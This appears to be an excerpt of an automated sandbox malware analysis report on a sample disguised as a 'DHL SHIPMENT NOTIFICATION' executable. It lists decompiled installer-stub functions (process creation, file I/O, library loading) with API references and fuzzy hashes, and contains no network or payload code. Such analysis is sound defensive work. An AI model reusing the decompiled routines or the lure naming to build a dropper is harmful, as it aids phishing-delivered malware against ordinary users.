                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                        • String ID:
                        • API String ID: 3248276644-0
                        • Opcode ID: fa3c9235a4b418ee68dfdff8e4277a43b5875b963336551736dc5840a4575c34
                        • Instruction ID: 38ed1c6f7611cbdad0e8a1dc3f16fb44af04154f1bcb09577380b12bcb23f66f
                        • Opcode Fuzzy Hash: fa3c9235a4b418ee68dfdff8e4277a43b5875b963336551736dc5840a4575c34
                        • Instruction Fuzzy Hash: 31F0282A148A5219D622B33A0D05ABF05458EC2354B0B063FFC53B12D1DF7C897385BF
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                        Download Yara Rule
                        C-Code - Quality: 69%
                        			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x7a8ad0;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x7a7a8c =  *0x7a7a8c + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x7a7a8c, 0x7530,  *0x7a7a74), 0);
					}
				}
				return 0;
			}











                        0x0040138a
                        0x004013fa
                        0x0040139b
                        0x004013a0
                        0x00000000
                        0x00000000
                        0x004013a2
                        0x004013a3
                        0x004013ad
                        0x00000000
                        0x00401404
                        0x004013b0
                        0x004013b7
                        0x004013bd
                        0x004013be
                        0x004013c0
                        0x004013c2
                        0x004013b9
                        0x004013b9
                        0x004013ba
                        0x004013ba
                        0x004013c9
                        0x004013cb
                        0x004013f4
                        0x004013f4
                        0x004013c9
                        0x00000000

                        APIs
                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                        • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: MessageSend
                        • String ID:
                        • API String ID: 3850602802-0
                        • Opcode ID: aa6623dc5ba143c6751f89f60c6741bc3c59239a488c9da53ae18f0a51eeece7
                        • Instruction ID: 0d0e525a89db022a3713d7d40a62d3a92fa7a1992dda9c0477917c3d4d329065
                        • Opcode Fuzzy Hash: aa6623dc5ba143c6751f89f60c6741bc3c59239a488c9da53ae18f0a51eeece7
                        • Instruction Fuzzy Hash: 5901F432624220ABE7094B389D05B2A3698E751315F10C67FF851F79F1EA78CC02DB4C
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00405C51 Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00405C51(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x7a4f90->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x7a4f90,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                        0x00405c5a
                        0x00405c7a
                        0x00405c82
                        0x00405c87
                        0x00000000
                        0x00405c8d
                        0x00405c91

                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: CloseCreateHandleProcess
                        • String ID:
                        • API String ID: 3712363035-0
                        • Opcode ID: a96f74c6d97d8fddc601bdb2e7485f3ed7604f934fc57424aef617628e035306
                        • Instruction ID: 1fa2a79eb519949bf7d30246b9e4481379e3d274eb9e55713eae969c2627164f
                        • Opcode Fuzzy Hash: a96f74c6d97d8fddc601bdb2e7485f3ed7604f934fc57424aef617628e035306
                        • Instruction Fuzzy Hash: 6AE0B6F4A00209BFEB00DFA4EE09F7B7AACEB44604F408525BD54F2191D7B9A8148A78
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00406A3B Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00406A3B(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a410);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
				}
				_t5 = E004069CB(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                        0x00406a43
                        0x00406a46
                        0x00406a4d
                        0x00406a55
                        0x00406a61
                        0x00000000
                        0x00406a68
                        0x00406a58
                        0x00406a5f
                        0x00000000
                        0x00406a70
                        0x00000000

                        APIs
                        • GetModuleHandleA.KERNEL32(?,00000020,?,00403756,0000000B), ref: 00406A4D
                        • GetProcAddress.KERNEL32(00000000,?), ref: 00406A68
                          • Part of subcall function 004069CB: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069E2
                          • Part of subcall function 004069CB: wsprintfW.USER32 ref: 00406A1D
                          • Part of subcall function 004069CB: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A31
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                        • String ID:
                        • API String ID: 2547128583-0
                        • Opcode ID: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                        • Instruction ID: 8bc6c373ae4a51b79335f269ef4a09a4b84a1385f2c3991dd3566e210a560b2e
                        • Opcode Fuzzy Hash: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                        • Instruction Fuzzy Hash: 56E0867660421066D610A6755D48D3773B89BC6710306843EF556F2040DB38DC359A6D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0040615E Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                        Download Yara Rule
                        C-Code - Quality: 68%
                        			E0040615E(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                        0x00406162
                        0x0040616f
                        0x00406184
                        0x0040618a

                        APIs
                        • GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe,80000000,00000003), ref: 00406162
                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406184
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: File$AttributesCreate
                        • String ID:
                        • API String ID: 415043291-0
                        • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                        • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
                        • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                        • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00406139 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00406139(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe); // executed
				}
				return _t7;
			}





                        0x0040613e
                        0x00406144
                        0x00406149
                        0x00406152
                        0x00406152
                        0x0040615b

                        APIs
                        • GetFileAttributesW.KERNELBASE(?,?,00405D3E,?,?,00000000,00405F14,?,?,?,?), ref: 0040613E
                        • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406152
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: AttributesFile
                        • String ID:
                        • API String ID: 3188754299-0
                        • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                        • Instruction ID: 4d59290e3aa44cd58c99826dd52d8cee581d87a9a88888807f370448835cb7c6
                        • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                        • Instruction Fuzzy Hash: C2D0C972504130ABC2502728AE0889ABB55EB642717014A35F9A5A62B0CB304C628A98
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00405C1C Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00405C1C(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                        0x00405c22
                        0x00405c2a
                        0x00000000
                        0x00405c30
                        0x00000000

                        APIs
                        • CreateDirectoryW.KERNELBASE(?,00000000,00403639,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00405C22
                        • GetLastError.KERNEL32 ref: 00405C30
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: CreateDirectoryErrorLast
                        • String ID:
                        • API String ID: 1375471231-0
                        • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                        • Instruction ID: 9b4f5430b3bbe22f75525a6a8288bb62ac5ef9e6fdb3d88c50eeb6a92616e2bf
                        • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                        • Instruction Fuzzy Hash: 1EC04C71218609AEE7705B209F0DB177A949B50741F11443A6686F40A0DA788455D92D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00406210 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00406210(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                        0x00406214
                        0x00406224
                        0x0040622c
                        0x00000000
                        0x00406233
                        0x00000000
                        0x00406235

                        APIs
                        • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,007923E3,0078B730,0040357F,0078B730,007923E3,Ody,00793730,00004000,?,00000000,004033A9), ref: 00406224
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: FileWrite
                        • String ID:
                        • API String ID: 3934441357-0
                        • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                        • Instruction ID: f08cceda346ec9350f11c22fcf513fe3bc01c5f1c17db0892cf19a12a1b56e8c
                        • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                        • Instruction Fuzzy Hash: 95E08C3220026AABCF10AE698C00AEB3B6CFB05360F01447AFE56E7040D334E83087A5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004061E1 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E004061E1(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                        0x004061e5
                        0x004061f5
                        0x004061fd
                        0x00000000
                        0x00406204
                        0x00000000
                        0x00406206

                        APIs
                        • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00793730,0078B730,004035FB,?,?,004034FF,00793730,00004000,?,00000000,004033A9), ref: 004061F5
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: FileRead
                        • String ID:
                        • API String ID: 2738559852-0
                        • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                        • Instruction ID: a9904075eeec40e7e939a2dde13f9046a7e38eb284923ea40542f090f2fca858
                        • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                        • Instruction Fuzzy Hash: 66E08632500219ABDF106E519C04AEB375CFB01350F01487AFD22E2151E231E87187A8
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004035FE Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E004035FE(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                        0x0040360c
                        0x00403612

                        APIs
                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032FC,?), ref: 0040360C
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: FilePointer
                        • String ID:
                        • API String ID: 973152223-0
                        • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                        • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                        • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                        • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00401FA4 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                        Download Yara Rule
                        C-Code - Quality: 78%
                        			E00401FA4() {
				void* _t9;
				intOrPtr _t13;
				void* _t15;
				void* _t17;
				void* _t20;
				void* _t22;

				_t19 = E00402DA6(_t15);
				E004056D0(0xffffffeb, _t7);
				_t9 = E00405C51(_t19); // executed
				_t20 = _t9;
				if(_t20 == _t15) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
						_t13 = E00406AE6(_t17, _t20); // executed
						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
							if(_t13 != _t15) {
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E004065B5( *((intOrPtr*)(_t22 - 0xc)), _t13);
						}
					}
					_push(_t20);
					CloseHandle();
				}
				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}









                        0x00401faa
                        0x00401faf
                        0x00401fb5
                        0x00401fba
                        0x00401fbe
                        0x0040292e
                        0x00401fc4
                        0x00401fc7
                        0x00401fca
                        0x00401fd2
                        0x00401fe1
                        0x00401fe3
                        0x00401fe3
                        0x00401fd4
                        0x00401fd8
                        0x00401fd8
                        0x00401fd2
                        0x00401fea
                        0x00401feb
                        0x00401feb
                        0x00402c2d
                        0x00402c39

                        APIs
                          • Part of subcall function 004056D0: lstrlenW.KERNEL32(007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405708
                          • Part of subcall function 004056D0: lstrlenW.KERNEL32(004030A8,007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405718
                          • Part of subcall function 004056D0: lstrcatW.KERNEL32(007A0F68,004030A8), ref: 0040572B
                          • Part of subcall function 004056D0: SetWindowTextW.USER32(007A0F68,007A0F68), ref: 0040573D
                          • Part of subcall function 004056D0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405763
                          • Part of subcall function 004056D0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040577D
                          • Part of subcall function 004056D0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040578B
                          • Part of subcall function 00405C51: CreateProcessW.KERNELBASE ref: 00405C7A
                          • Part of subcall function 00405C51: CloseHandle.KERNEL32(?), ref: 00405C87
                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?), ref: 00401FEB
                          • Part of subcall function 00406AE6: WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401F9F,?,?,?,?,?,?), ref: 00406AF7
                          • Part of subcall function 00406AE6: GetExitCodeProcess.KERNELBASE(?,?), ref: 00406B19
                          • Part of subcall function 004065B5: wsprintfW.USER32 ref: 004065C2
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
